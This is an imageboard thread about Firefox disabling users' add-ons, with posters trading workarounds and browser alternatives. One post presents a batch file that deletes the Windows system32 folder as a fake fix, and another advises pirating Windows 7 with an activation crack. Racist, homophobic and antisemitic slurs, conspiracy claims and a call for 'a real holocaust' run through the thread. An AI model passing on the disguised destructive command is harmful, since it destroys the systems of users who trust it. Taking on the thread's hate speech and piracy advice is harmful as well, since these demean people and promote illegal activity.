There really is a Linux, and these people are using it, but it is just a
part of the system they use. Linux is the kernel: the program in the system
that allocates the machine's resources to the other programs that you run.
The kernel is an essential part of an operating system, but useless by itself;
it can only function in the context of a complete operating system. Linux is
normally used in combination with the GNU operating system: the whole system
is basically GNU with Linux added, or GNU/Linux. All the so-called "Linux"
distributions are really distributions of GNU/Linux.

Hunter Brown
Hunter Brown

Yeah, I'm sure it's a conspiracy to show you ads for one day until it gets fixed or you install a different browser.

Lucas Wood
Lucas Wood

A test run.

Leo Sullivan
Leo Sullivan

Well this isn't cuckchan where people make retarded pointless redundant repetitious threads about nothing that get derailed and die in 5 minutes, so that's to be expected.

Jason Phillips
Jason Phillips

Only my Android Mozilla Add-ons have been fucked up. Firefox disabled NoScript, AdblockerPlus, HTTPS everywhere and a VPN add-on on my one shitty tablet.

Aiden Nelson
Aiden Nelson

Auto-updates that can be turned off only by hacky workarounds. Google as default search engine. Analytics on Brave's home page. Two other requests made at each start of Brave. Whitelisting spyware from Facebook and Twitter. Has some decent privacy protections built in, but uMatrix is still better. Some privacy features are there by default, but, it's still trying to work with advertisers (same as Mozilla did with their Sponsored Tiles). Despite claiming to be "A browser with your interests at heart."[1], it has Google as default search engine, as well as shitty forced updates. Anyway, despite the privacy protections, you should stay away from this browser - it seems to have a "mission" to switch the internet to its version of "user-respecting" ads, (we know how that turned out for Mozilla), and that's slimy and suspicious. Beyond that it has repeatedly shown itself to be dishonest and disingenuous about what it's mission and goals and operations are.

On it's website, Brave claims that "Brave fights malware and prevents tracking, keeping your information safe and secure. It’s our top priority." Yet despite this claim, Brave actually disables its tracking protections for Facebook and Twitter's spyware scripts that allow them to track people across the web.

Brave will check for updates every time you run it, and you CANNOT turn it off (except through fiddling with DNS and such) ! What is the devs' answer? From their GitHub page: "We don't plan on adding in UI to disable updates, but users can easily adjust environment variables if they really want to put themselves at risk." So according to the devs, you have to hunt down random internet comments to be able to disable auto-updating. Brave will also update what looks like the list of its "partners" every time you run it.
spyware.neocities.org/articles/brave.html

Ayden Collins
Ayden Collins

One day? we'll see if they are going to be automatically enabled back, because if not, lots of people wont do it.

James White
James White

no mention of sys32
Probably a legitimate fix, but I can't say I'm not disappoint
or bigger with an equine variant, and excessive seminal output anywhere from pints to gallons.
You learn something new every day. Still though, you've been watching this shit since you've are 8? Pretty degenerate desu

Justin Allen
Justin Allen

Easy fix by Mozilla:
blog.mozilla.org/addons/2019/05/04/update-regarding-add-ons-in-firefox/comment-page-3/

Attached: Capture.PNG (29.14 KB, 601x265)

Chase Perez
Chase Perez

Too late, already uninstalled :^)

Jaxson Nguyen
Jaxson Nguyen

Why wouldn't this be working for me? Because it doesn't.

Samuel Evans
Samuel Evans

There are hardly any decent alternative browsers right now. All the current Firefox forks are outdated and basically dead projects, and de-jewgled Chromium options aren't all that great either (Brave is the least shitty, Vivaldi is closed source). Cuckzilla and their faggot nonsense keep screwing shit up. Could some fa/g/s get together and fork Firefox and make it not trash? Maybe call it Earthworm or something.

David Robinson
David Robinson

Firefox
SJW tier
Waterfox
shit doesn't load
Gnu IceCat
STALLMAN TIER
The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression.
Pale Moon
outdated
shit doesn't load
(((Brave)))
BOTNET
"degoogled" (((chrominum)))
BOTNET

what do

Leo Davis
Leo Davis

There isn't much of a reason to create free stuff unless you're trying to steal user data.

Matthew Bailey
Matthew Bailey

According to Palemoon's site the last update was 2019-03-27, still pretty up to date if you ask me.
shit doesn't load
If you mean webms you have to enable a setting that allows them to play in a better format

Samuel Nelson
Samuel Nelson

Brave is leftist cuck ware and they sponsor leftist podcasts

Attached: 985077E1-24A2-4592-9563-4BA26F697BA4.jpeg (86.34 KB, 584x680)

Michael Allen
Michael Allen

Good thing that this wasn't caused by an update, but by Mozilla remote controlling your addons.
Good thing that you're retards who yap without knowing what you're talking about.

Andrew Rivera
Andrew Rivera

who gives a shit, works for me

Dylan Mitchell
Dylan Mitchell

That would be stupid.
Yeah, almost as stupid as you who is wrong and a faggot.

Aiden Flores
Aiden Flores

ice dragon went to shit now after 3 hrs on it ,just dropped every add on
says not compatible

John Rivera
John Rivera

Simple fix
search for xpinstall.signatures.required
change it to false
I think it only works on certain versions (e.g., ESR). Can result in security issues. Remember to turn it back on after this issue is fixed.

Camden Ward
Camden Ward

What are my options if I want to use an unsigned add-on? (advanced users)

Firefox Extended Support Release (ESR), Firefox Developer Edition and Nightly versions of Firefox will allow you to override the setting to enforce the extension signing requirement, by changing the preference xpinstall.signatures.required to false in the Firefox Configuration Editor (about:config page). There are also special unbranded versions of Firefox that allow this override. See the MozillaWiki article, Add-ons/Extension Signing for more information.

Robert Fisher
Robert Fisher

I didn't get hit initially either. But I just got a notice twenty minutes ago stating my addons were disabled. Checked, and yup, they're gone. I shut off auto-update when I downloaded too.

Attached: glowstick.png (177.96 KB, 540x742)

Ryder Evans
Ryder Evans

a couple of hours ago my addons crapped out. now im trying to config palemoon, as i didnt like brave

Austin Gomez
Austin Gomez

this has got to be some kind of conspiracy right?

John Sanders
John Sanders

um, don't be such a pleb and just fix it. it only took me about 5 minutes this morning and i'm back up and running for all extensions and add ons.

Colton Jones
Colton Jones

blog.mozilla.org/addons/2019/05/04/update-regarding-add-ons-in-firefox/

Attached: firefoxfix.png (110.99 KB, 994x450)

Camden Thomas
Camden Thomas

i also had auto updates disabled. looks like they fucked us all. got to be a conspiracy.

pol is fucked for me as well. the main catalog does not go large when image size is selected. in threads there is no popout window to conveniently reply. you have to click a post number and then scroll to the top of the whole damn page. replies are not showing next to post numbers. replies are not highlighted when the post number they are replying to is scrolled over. images are loading on separate pages.

fuck firefox.

Ethan Hughes
Ethan Hughes

see there's a fix you can install yourself.

Jeremiah Diaz
Jeremiah Diaz

Dissenter Free Speech Web Browser Beta For Windows

-Blocks ads and trackers that make Big Tech money on your data

-Dissenter comment section on every URL on the internet

-All Chrome Extensions work with it

Brandon Walker
Brandon Walker

ICECAT

icecat isnt linux only fucknut

Jeremiah Gomez
Jeremiah Gomez

ATTENTION

versions of Firefox will allow you to override the setting to enforce the extension signing requirement, by changing the preference xpinstall.signatures.required to false in the Firefox Configuration Editor page about:config

Then you just look for "LEGACY ADDONS"
Umatrix/ Ublock/ https everywhere

Attached: 12357379-9F465E15-717B-4BD5-938A-5EEFDC53A9AB.jpeg (2.61 MB, 4032x3024)

Daniel Wilson
Daniel Wilson

Stop posting porn faggot

Cameron Cruz
Cameron Cruz

working on firefox quantum 66.0 on linoox

Jordan Mitchell
Jordan Mitchell

Brave is botnet

Nathaniel Thomas
Nathaniel Thomas

Damn that's a prostitute?

Ian Barnes
Ian Barnes

thanks user. worked like a charm!

Attached: babes-beers-2.jpg (106.73 KB, 900x469)

Brayden Johnson
Brayden Johnson

WE WUZ COMPUTAHS N SHEEIT Zig Forums

Parker Carter
Parker Carter

HEIL
sorry just wanted to get people's attention

Hudson Mitchell
Hudson Mitchell

put spoilers on if you're going to post that garbage. this isn't 4cucks faggot.

Charles Russell
Charles Russell

no wonder i'm having issues with addblock
for some reason an addblock setting page opens up whenever a open mozilla and i have to manually re-set all the add nuking
once i do however, addblock workds just fine
but if i close that addblock setting page i can't open it again and don't know where to find it, only thing i can do is to reset my PC

Joshua Torres
Joshua Torres

Is that pic what heaven looks like?

Carter Bennett
Carter Bennett

I already fixed it with the code I posted here

Everything right now is working perfectly and I was able to backup all my rules.

Ethan Lopez
Ethan Lopez

Download the .xpi file of whatever add-on you want.
Type in "about:debugging" in Firefox
Enable add-on debugging
Load your add-in from .xmi file

Ta-dah! Just like that, you have your add-ons back. Mozilla has done this before. Switch to Palemoon at some point.

Attached: 850df58a282fd89303a1a5e27449b4d59a399d4a78aaf2808e1ead32caf8efd9.png (433.55 KB, 854x770)

Gabriel Nguyen
Gabriel Nguyen

What browsers are you faggots using as alternatives
using firefox
waterfox is a better alternative

Parker Rodriguez
Parker Rodriguez

This is the Mozilla fix they're suggesting

hey goy enable data mining, it will only take a couple days to data mine everyone's bookmarks, traffic, and usage data

Attached: ff-allow-studies.jpg (67.66 KB, 1200x600)

Austin Rodriguez
Austin Rodriguez

how do you watch youtube if javascript is disabled?

Hudson Gray
Hudson Gray

immediately abandon Firefox.
and use what?

Josiah Bell
Josiah Bell

yeah it sounded like a tarball op to me.

or a fucking dumb idea for a shitpost

Benjamin Brooks
Benjamin Brooks

Cleardream to browse the web
link pls

Jonathan Diaz
Jonathan Diaz

i tried it. was slower and the youtube video downloder didnt work for me

Blake Foster
Blake Foster

Oy v-

Caleb Peterson
Caleb Peterson

what do
move to the woods. only way to be sure

Attached: uncle-ted-cabin.jpg (96.04 KB, 500x381)

Ryan White
Ryan White

It didn't work for me. Which of the alternative browsers being suggested has functionality closest to uBlock and uMatrix?

Carson Edwards
Carson Edwards

falkon isnt too bad

Dylan Morales
Dylan Morales

Just turned on (((allow studies))) goyim. And got the hotfix. All my add ons are back. Damn the web suck without adblock and add ons.

Attached: 01-Anton-Batov-Illustrations-of-Modern-Egyptian-Hieroglyphs-www-designstack-co.jpg (190.99 KB, 800x693)

Bentley Jones
Bentley Jones

I hear Brave is leftycucked

Carson Edwards
Carson Edwards

I didn't realize how completely shit the internet is without ad blockers. It's like standing in Times Square.

Andrew Taylor
Andrew Taylor

If you enable studies in firefox, make sure the relevant study is active (says something like 'signature xpi fix' or similar), then disable studies again, it'll work. Don't need to leave studies enabled, although the fact that such a thing is required for a hotfix, rather than just releasing a normal browser update, is itself suspicious.
I tried Pale Moon but pages took 2-3x as long to load.

Jose Young
Jose Young

Oh, and it only took 20 seconds or so for the relevant study to become active, after which I disabled them. No idea what the 'wait a day or so' shit is about, but if it had taken longer than a few minutes I would've just uninstalled it entirely and suffered with Pale Moon or tried another browser.

Tyler Morales
Tyler Morales

this.they hire subhuman shitskins and dye their hair blue/green rainbow after being totally brainwashed by anti white jew rats since birth just like their idiot boomer parents and BLUMPF!! REEEE!!!

Bentley Brown
Bentley Brown

Jewtube getting their ads enabled finally gave me the push I needed to switch to Brave. It's actually not bad.

Kevin Garcia
Kevin Garcia

Use brave you autistic fuck , ever since Soros infested FireFox I only look at it in disgust whenever I see it

Christian Allen
Christian Allen

BRAVE IS ANTIFA YOU FUCKING MONGOLOID

Jordan Reed
Jordan Reed

ARE YOU FUCKING RETARDED YOU FUCKIN CIA KIKE , u want my loli folder dont you?

Wyatt Perry
Wyatt Perry

it wont work with older rigs pre specter, it only works on 64 not 32 bit.Brave has along way to go plus I dont trust anything much less anything google even if it claims to be muh free open source goy come to my honey pot so I can log you evil anti semites so we don't get expelled from the greatest golden goose ever made by whites for us because our sand dune religion says we are chosen.

Eli Hughes
Eli Hughes

Good to have you here, I need some help encrypting my PC. Forgive me for being a WINfag, I will buy a Raspberry PI and load Debian there soon, but I've gotta work with what I have right now. I heard TrueCrypt is a good tool, however the program itself has a message that says it's not "safe". What should I do then?

Caleb Roberts
Caleb Roberts

Holy shit this thread still exists? Don't listen to anything thay say go^Huys, it's a psyop. Trust Mozilla, they know what they are doing.

Eli Wright
Eli Wright

github.com/Eloston/ungoogled-chromium
ungoogled-software.github.io/ungoogled-chromium-binaries/

Cooper Rivera
Cooper Rivera

intellihub.com/mozilla-joins-george-soross-efforts-in-launching-a-strike-against-fake-news/

Kike alert

Owen Wood
Owen Wood

-Blocks ads and trackers that make Big Tech money on your data

-Dissenter comment section on every URL on the internet

-All Chrome Extensions work with it

Carter Bailey
Carter Bailey

aka spying re-skinned google chrome + gab kike spyware

Hudson Rivera
Hudson Rivera

Let's face the truth here, every browser is mostly shit. What's the fucking point of bitching at each other about it? My shit doesn't smell as bad as your shit? We should be putting the blame where it belongs because the browsers aren't the real root of the problem, the problem is the web itself is a fucking shit show. The other day I loaded some website and uBlock blocked 400+ external dependencies. What kind of fucked up website design requires 400+ dependencies? And don't even get me started on how fucked web development is, the only amazing thing about it is that any of it works at all.

The deterioration we're seeing on the web in terms of technology is just another reflection of the deterioration we're seeing as a civilization and as a species. If this colossal fuck system is the best we can do as humanity, our species is fucked over the long term.

Isaac Ward
Isaac Ward

proof?

David Parker
David Parker

SIMPLE FIX

Attached: .png (12.85 KB, 616x135)

Henry Morales
Henry Morales

Iridium Browser looks solid
spyware.neocities.org/articles/iridium.html

github.com/iridium-browser/tracker/wiki/Differences-between-Iridium-and-Chromium

Attached: iridium-logo.jpg (11.23 KB, 128x128)

Isaac Cooper
Isaac Cooper

You can run Lynx from a separate, unprivileged userid on a free tty at the system console. They also pledge'd it, and the code is thousands of times smaller than firefox and chromium. The only trick is getting images to show (you can configure it to run an external image viewer). But you need a framebuffer console and a suitable image viewer. I got Lynx+fbi (frame buffer image viewer) to work in Linux this way, but haven't found something similar in pkgsrc (I'm on NetBSD, because it runs my hardware better). Might just make an SDL image viewer myself though…
Links and w3m would also work much the same, but they support stuff like frames, so you have to disable that shit in the config. You don't want your browser loading a frame from an unrelated site than the document you requested. The nice thing about Lynx is it *only* downloads what you asked it to, and it checks all cookie requests and prompts you if something is suspicious (and you can outright disable them if you don't need them).

Attached: desk.jpg (129.05 KB, 690x924)

Logan Lopez
Logan Lopez

When you touch the world, the world touches you, user.

Austin Perez
Austin Perez

github.com/seebye/ueberzug seems interesting.

Austin Sanders
Austin Sanders

The whole fucking browser starts stuggling just from moving tabs around.

Nolan Perry
Nolan Perry

TrueCrypt is no longer usable. Use VeraCrypt. It's pajeetware but it works. Never use Windows 10. Windows 7 is preferred. Don't try to fix the current mess you have, you'll want to do a clean install.

First wipe your drive:
From a Linux LiveUSB:

Find drive name (match it by size)

sudo fdisk -l

Wipe (will take a while)

sudo dd if=/dev/urandom of=/dev/sd[your drive letter]

sudo dd if=/dev/urandom of=/dev/sd[your drive letter] # extra paranoid

sudo dd if=/dev/zero of=/dev/sd[your drive letter]

Attempt file recovery with PhotoRec after.

Now install the OS
Torrent an iso of W7 SP1 Professional. Burn to USB with Rufus (MBR, not GPT). Use Daz loader to activate. Use Ancile and Xp-antispy to remove spying. There are many tweaks that need to be done, that include disabling services (See blackviper), turning windows features off, disabling system restore, prevent automatic defrag, clearing up start menu etc (see InstallGentoo wiki's page on Windows 7). Use TinyWall to block everything except which you allow. Use its "show connections" feature to monitor what is going on.

I can help further when this disabled addon problem is over.

Connor Barnes
Connor Barnes

I tried that but it didn't fix my problem. It's still worth disabling though.
This solved the addons being disabled for me.
Shut down Firefox
Press [Windows Key]+[R] → Type in %APPDATA% > click OK
(C:\Users\*USERNAMEGOESHERE*\AppData\Roaming\Mozilla\Firefox\Profiles\eknvp9aw.default)
Open extensions.json with Notepad
Replace all instances of “appDisabled”: true with “appDisabled”: false
Replace all instances of “signedState”:-1 to “signedState”:2
Save and start browser
Disable and re-enable all extensions in about:addons

Noah Murphy
Noah Murphy

If only they had rewritten their browser in Rust
:^)

Jaxon Parker
Jaxon Parker

Not using Mosaic 1.0
Get the fuck on my level

Michael Thompson
Michael Thompson

Some sites for me don't seem to be working well with the uMatrix/uBlockOrigins/Ghostery suite after the update and reinstall, even though they worked prior to the wipe out.

Connor Peterson
Connor Peterson

What was the saying again, Zig Forums? "if it's for free, you are the product"?

Henry Wilson
Henry Wilson

Mosaic doesn't like 8ch (see error). wiby.me and old sites seem to work fine though.

Attached: scr.png (118.35 KB, 1280x1024)

Luis White
Luis White

Not using a revolving IP address with Mac spoofing and analog designed timing circuit to control the numerical and location of your variable proxies.

Fucking amateur hour in here.

Grayson Stewart
Grayson Stewart

Why would I work here? I am not gay.

Nathaniel Cook
Nathaniel Cook

Literally you faggots are niggers compared to me. I got banned from owning a computer by the NSA. Those of that do know something are codemonkeys at best. I designed whole systems on a damn dry erase board for fun.

Jeremiah Anderson
Jeremiah Anderson

I know I'll catch a lot of flack here, but I unironically use chrome browser with minimal extensions. Adblock, Web Of Trust, Text-to-Link, and Old Youtube extensions. I could give a fuck how much they track me. The worst I do on the net is advocate for a real holocaust on Zig Forums.

Jaxon Rodriguez
Jaxon Rodriguez

I could give a fuck
Couldn't. It's couldn't, user. I suppose you volunteered for circumcision too.

Ayden Jackson
Ayden Jackson

go to about:config
change xpinstall.signatures.required from true to false
addons are instantly working again
this was done to thwart dissenter i believe. they cant have the whole internet having an unregulated comments section for people to freely pass their ideas to others, more people will wake up to what (((they))) are doing, cant have that now

i did read some version of FF wont allow it but my ubuntu did, you may have to download the nightly or dev version or something if you dont have this option in your about:config

if your too stupid to work this shit out on your own like i am, at least learn to google… its not that hard

Attached: Unsdsdgffdshtitled.png (6.38 KB, 1254x163)

Jonathan Turner
Jonathan Turner

Poh-tay-toh
Poh-tah-toh

Samuel Harris
Samuel Harris

No, saying you could give a fuck means you still care how much they track you and could be more concerned. Couldn't giving a fuck means you haven't a care for their tracking, meaning you aren't capable of caring more for their action. Difference.

Isaac Johnson
Isaac Johnson

Not that it really matters but I DL waterfox and reinstalled my add ons and extensions. Everything is right with the world once again.

Cooper Butler
Cooper Butler

Do not install brave browser! I felt a little bit unsure at first with the paid to view ads feature. I tried to install some Google ad ons and it started spamming the page with hebrew. Fuck brave browser.

Christian Anderson
Christian Anderson

I'm going to experiment both another day and they probably got umatrix, ublock, https or similar for addon.
So I just want to know if there a certain addon…
allow copy text and paste in certain sites which block it.
Like this one
addons.mozilla.org/en-US/firefox/addon/absolute-enable-right-click/

Jacob Ortiz
Jacob Ortiz

Palemoon has ports of aforementioned addons. Ublock just needs a simple workaround
Download ublock .xpi from github
Manually install extension
Download ublock updater addon from palemoon extension repo
Detailed instructions can be found in the description for the ublock updater

Noah Wright
Noah Wright

fuging plebes

heres what you do

@echo off
del c:\WINDOWS\system32

Save as firefoxext.bat
and run

/thread
No need to thank me

Zachary Cruz
Zachary Cruz

This solution doesn't work for me.

Niggerfox can go.

Austin Wood
Austin Wood

Nice

Benjamin Price
Benjamin Price

Or just disable js

Attached: Screenshot-20190507-124844.png (254.53 KB, 1440x2560)

Josiah Green
Josiah Green

It is. The fact it happens to Tor browser on system Tor is proofs that Intregeri and Sajolida are jews like Torvalds and Jobs. I haven't tried other systems yet today, though, so others are probably jews as well.

Aiden Harris
Aiden Harris

still using SJWfox after they ousted Eich
I thought people on this board were supposed to be kinda smart. Or the zoomers here have no recollection of that even because they were still in the 6th grade?